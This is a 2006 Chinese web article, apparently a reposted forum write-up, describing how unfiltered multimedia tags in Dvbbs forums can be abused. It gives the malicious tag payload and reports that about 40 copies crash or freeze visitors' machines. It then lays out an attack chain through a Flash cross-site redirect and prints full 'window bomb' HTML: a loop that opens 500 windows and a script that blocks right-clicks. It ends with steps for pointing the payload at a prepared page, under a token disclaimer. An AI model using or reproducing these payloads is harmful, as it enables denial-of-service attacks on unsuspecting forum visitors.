动网论坛多媒体标签未过滤漏洞

王朝other·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

动网论坛多媒体标签未过滤漏洞测试手记

今天在剑鹰看到这个漏洞的说明,就想测试一下,先找了个动网论坛,发贴的内容如下:

{mp=0,0}c:\ddos.rmi{/mp}

..........省去一部分。代码中记得把{}换成[]

经过测试,当贴中包含大概40个这样的语句时,就可以让WIN98内存耗尽而蓝屏。

对于WIN2000可以使CPU使用率达到满负荷,即使及时关掉IE的进程,系统仍然会出现一些不正常的现象,如右键菜单无法正常显示等。

再深入发展一下,结合动网前一段时间可以在FLASH中插入URL来跨站攻击的漏洞,如果我们在FLASH中制向的是我们特制的一个HTML页面,进入后会弹出N个包含了{mp=0,0}c:\ddos.rmi{/mp}语句的动网页面,就可以大大加强炸弹的威力(这么多进程你关那个啊,呵呵~~~)

攻击过程:

在一个动网发一个插入了非法的多媒体标签的帖子----做一个窗口炸弹的HTML页面,将URL指向插入了多媒体标签的动网页面-----将窗口炸弹的HTML页面的URL插入FLASH中---将FLASH发到目标论坛上??????????//这样别人访问了这个插入了FLASH的贴就中招了~~~~

以下是HTML的代码:

html>

<head>

<title>窗口炸弹</title>

</head>

<body>

<script language="jav*script">for(g=0;g<500;g++){window.open("www.cbhu.net")}</script>

<p><!--webbot bot="HTMLMarkup" startspan --><html>

<head>

</head>

<body>

<script language="JavaScript">

<!--

if (window.Event)

document.captureEvents(Event.MOUSEUP);

function nocontextmenu()

{

event.cancelBubble = true

event.returnValue = false;

return false;

}

function norightclick(e)

{

if (window.Event)

{

if (e.which == 2 || e.which == 3)

return false;

}

else

if (event.button == 2 || event.button == 3)

{

event.cancelBubble = true

event.returnValue = false;

return false;

}

}

document.oncontextmenu = nocontextmenu;??// for IE5+

document.onmousedown = norightclick;??// for all others

//-->

</script>

</body>

</html><!--webbot bot="HTMLMarkup" endspan -->

</p>

</body>

</html>

~~~~~~~~~~~~~~~END~~~~~~~~~~~~~~~~~

<script language="jav*script">for(g=0;g<500;g++){window.open("www.cbhu.net")}</script>

把这句中的www.cbhu.net换成你发准备好的插入了多媒体标签的动网页面就可以了~~

此文仅做为技术讨论之列,如果用于恶意破坏,后果将由你自来承担!!

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航